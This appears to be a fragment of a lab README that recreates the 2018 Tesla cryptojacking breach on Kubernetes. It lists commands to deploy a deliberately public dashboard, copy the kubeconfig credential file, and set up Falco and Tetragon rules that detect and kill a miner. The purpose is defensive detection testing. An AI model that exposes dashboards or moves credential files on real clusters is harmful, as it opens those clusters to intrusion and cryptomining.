![Screenshot 2023-11-03 at 11 39 14](https://private-user-images.githubusercontent.com/126002808/280266084-dd3f0e88-709b-40bd-b486-bf9f49a6801e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgwMjY2MDg0LWRkM2YwZTg4LTcwOWItNDBiZC1iNDg2LWJmOWY0OWE2ODAxZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jM2JlYTUyODY2ZDQ2NzBiZTRkM2I3YWExNWU2YmFhNmI0OTA4NTFkZDk2MmExMmNjZDJjZWQ5ZWI1MjVjMTg1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.fIsGu3lFnJ7w8DFkBtpt9TY8ykA6_z728fmqRTt9YAU)
helm uninstall kubernetes-dashboard -n kubernetes-dashboard
![Screenshot 2023-11-18 at 23 47 28](https://private-user-images.githubusercontent.com/126002808/284028524-6df07524-7625-4ab1-ac07-b479fd0d061b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDI4NTI0LTZkZjA3NTI0LTc2MjUtNGFiMS1hYzA3LWI0NzlmZDBkMDYxYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mODk3ZjRhMGY2MTJkYWQ4ODY5MzI5ZDA5YzYyYTZjZDJkZDkxY2Y1OGNiMjA2NGJlYmU2YmYzNjZmYTVkYWU0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9Agf1TLRlWh4hJ-HuE6HUQrkPlwRQ6oj7Fbag_diMM4)
Copying the kubeconfig file from its rightful location to my desktop:
cp ~/.kube/config ~/Desktop/
helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system
kubectl rollout status -n kube-system ds/tetragon -w
Create a TracingPolicy in Tetragon
kubectl apply -f https://raw.githubusercontent.com/cilium/tetragon/main/examples/tracingpolicy/tcp-connect.yaml
Open an activity tail for Tetragon (Terminal 2):
kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact --namespace default --pod tesla-app
Open an event output for Falco (Terminal 3):
kubectl logs --follow -n falco -l app.kubernetes.io/instance=falco | grep k8s.pod=tesla-app
![Screenshot 2023-11-18 at 20 31 20](https://private-user-images.githubusercontent.com/126002808/284021938-c31688f9-5765-4f0c-baae-884451575e78.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDIxOTM4LWMzMTY4OGY5LTU3NjUtNGYwYy1iYWFlLTg4NDQ1MTU3NWU3OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNmNmMjRhMThkMDY5N2RkYzNjYjJiZTdlNmRhNWRjMDg3MGMzOTNjYTRlNDQyYzlkMzFjZDM2NjBjZGU3MGE3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.vFKNgrcVstjMge485yshmeIu1jTsqXU0VzXBTbqsSbo)
Now we apply a Tetragon TracingPolicy that will perform sigkill action when the script is run:
https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/sigkill-miner.yaml
![Screenshot 2023-11-18 at 20 40 11](https://private-user-images.githubusercontent.com/126002808/284022322-02a6f86d-61fb-4537-b7a5-66e75d4bb598.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDIyMzIyLTAyYTZmODZkLTYxZmItNDUzNy1iN2E1LTY2ZTc1ZDRiYjU5OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZmJmOGM4OWYyOThlZWI5OWM4NmJjNWU2MmY1MmFjOWU1N2Y3ODdmMDhjYzRjODg3MWI4MWE4MjUyMDQyZGZlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.6BFoKHKUwzy8FvSnclW3M7Km-Ticl-LCI350KC7iiZw)
Base64 encoding, mining binaries and mining pools. They all work!! :)
helm install falco falcosecurity/falco \
-n falco \
--version 3.3.0 \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false \
-f custom-rules.yaml
Deploy Kubernetes Dashboard:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
![Screenshot 2023-11-18 at 23 59 08](https://private-user-images.githubusercontent.com/126002808/284028807-aca83730-ff4b-4c58-a949-8f48dce9c608.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDI4ODA3LWFjYTgzNzMwLWZmNGItNGM1OC1hOTQ5LThmNDhkY2U5YzYwOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jMGUwMDg1ZGYwZGFhMTliNmRjYjkxMWUwZDE5YjRkOWI4ZjA5ZTY4ZTUyZjMyODY5YjJhNjQ0Y2Y3MmFlNjFkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.eZB4lQjCqm38wMBj8Drm8N0wpKezFan3hiiNIfx3vN8)